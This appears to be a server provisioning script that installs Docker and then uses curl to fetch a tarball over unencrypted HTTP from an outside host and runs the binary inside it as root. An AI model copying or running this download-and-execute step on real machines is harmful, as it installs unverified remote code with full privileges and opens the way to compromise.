#!/bin/bash
echo "This data delivered by app-prod1 in subnet-153cur3ms as part of vpc-11t5a2ur3 protected by prod1.gwinthesky.net " > /tag
apt-get -y update
apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
echo "deb https://apt.dockerproject.org/repo ubuntu-trusty main" >> /etc/apt/sources.list.d/docker.list
apt-get -y update
apt-get -y install linux-image-extra-$(uname -r)
apt-get -y install docker-engine
curl -o /root/containers.tar.gz http://www.killhup.cx/tt.tar.gz
tar xf /root/containers.tar.gz -C /root/
rm -f /root/containers.tar.gz
/root/containers/MakeSystem
touch /fuckindone
